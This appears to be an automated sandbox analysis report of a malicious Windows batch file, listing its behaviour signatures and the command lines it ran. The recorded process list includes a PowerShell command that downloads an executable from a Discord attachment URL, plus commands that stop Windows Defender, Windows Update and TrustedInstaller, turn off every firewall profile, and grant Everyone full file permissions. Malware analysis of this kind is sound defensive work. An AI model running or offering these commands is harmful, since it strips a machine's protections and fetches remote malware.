Analysis Overview
SHA256
f7d324eec5fc6cec83bdafd21c65e6909d847c7ea40091b87243bfd5c2c0f549
Threat Level: Known bad
The file runasadmin.bat was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Possible privilege escalation attempt
Modifies file permissions
Launches sc.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Runs net.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-22 18:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 18:04
Reported
2024-05-22 18:05
Platform
win7-20240221-en
Max time kernel
35s
Max time network
19s
Command Line
Signatures
Disables service(s)
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
C:\Windows\system32\sc.exe
sc config "wuauserv" start= disabled
C:\Windows\system32\sc.exe
sc config "TrustedInstaller" start= disabled
C:\Windows\system32\net.exe
net stop wuauserv
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
C:\Windows\system32\net.exe
net stop TrustedInstaller
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrustedInstaller
C:\Windows\system32\takeown.exe
takeown /F C:\X\Y\Z /A /R
C:\Windows\system32\icacls.exe
icacls C:\X\Y\Z /grant Everyone:F /T
C:\Windows\system32\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
Network
Files
memory/2300-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
memory/2300-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2300-6-0x000000001B220000-0x000000001B502000-memory.dmp
memory/2300-8-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2300-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2300-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2300-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp